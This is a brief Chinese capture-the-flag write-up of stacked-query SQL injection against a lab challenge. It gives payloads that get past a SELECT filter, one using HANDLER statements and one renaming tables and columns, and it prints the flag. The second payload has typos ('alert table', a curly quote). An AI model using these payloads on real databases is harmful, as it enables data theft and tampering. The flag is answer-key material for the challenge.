1.老规矩:
2.有一个过滤:
3.使用堆叠查询,show tables:
4.show columns from words:
5.show columns from 1919810931114514(注意这个不是单引号):
6.发现flag在1919810931114514这个表中,因为select被过滤了,所以我们想办法用其他方法把flag显示出来。
-
方法一:handler
handler table_name open; //打开表
handler table_name read first; //读取数据
payload:1';handler1919810931114514open;handler1919810931114514read first;#
flag{ec54576f-4910-4c98-a60a-c91a2b0d322b} -
方法二:我们现在是在words这个表中,内部查询类似select id,data from words where id =,可以先将words这个表改成别的名字,id这个列名改为别的名字,再将1919810931114514改名为words,flag改名为id
payload:
1’;rename table words to words1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#